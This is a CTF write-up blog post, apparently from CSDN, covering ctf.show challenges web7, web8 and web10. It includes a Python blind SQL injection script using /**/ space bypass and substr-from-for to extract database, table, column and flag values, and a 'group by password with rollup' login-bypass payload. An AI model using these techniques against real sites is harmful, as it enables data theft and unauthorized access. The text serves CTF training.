ctf.show web7,8,10

web7
查看列表文章发现?id= 判断为sql注入
在这里插入图片描述
当有空格时会报错,用/**/绕过,得到注入点
在这里插入图片描述
盲猜flag from flag
在这里插入图片描述
web8
测试发现过滤了空格,逗号,and
在这里插入图片描述
当url判断为真时有回显
在这里插入图片描述
数据库视角:
在这里插入图片描述

进行盲注
在这里插入图片描述

substr(database(),1,1) 等同于
substr(database()from 1 for 1)
写python 脚本

import requests
import re
s = r'<h4>If</h4>'
flag = ''
url = 'http://6327c4bc-77a9-431f-9ccb-95564a82c238.chall.ctf.show/index.php?id=0/**/or/**/'
for i in range(1,50):
	for j in range(31,129):
		#html=requests.get(url+'ascii(substr(database()/**/from/**/'+str(i)+'/**/for/**/1))='+str(j)) #库
		#html=requests.get(url+'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/'+str(i)+'/**/for/**/1))='+str(j))#表
		#html=requests.get(url+'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/'+str(i)+'/**/for/**/1))='+str(j))#字段
		html=requests.get(url+'ascii((substr((select/**/flag/**/from/**/flag)from/**/'+str(i)+'/**/for/**/1)))='+str(j))#flag
		r=re.findall(s,html.text,re.S)
		if(r):
			flag += chr(j)
			break
print(flag)
print('------------------------------------')

得到flag
在这里插入图片描述
web10
点取消下载到源代码文件
在这里插入图片描述
判断passwd
gourp by password 将password字段分组
with rollup:在group分组字段的基础上再进行统计数据
在这里插入图片描述
payload:username='or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=

在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值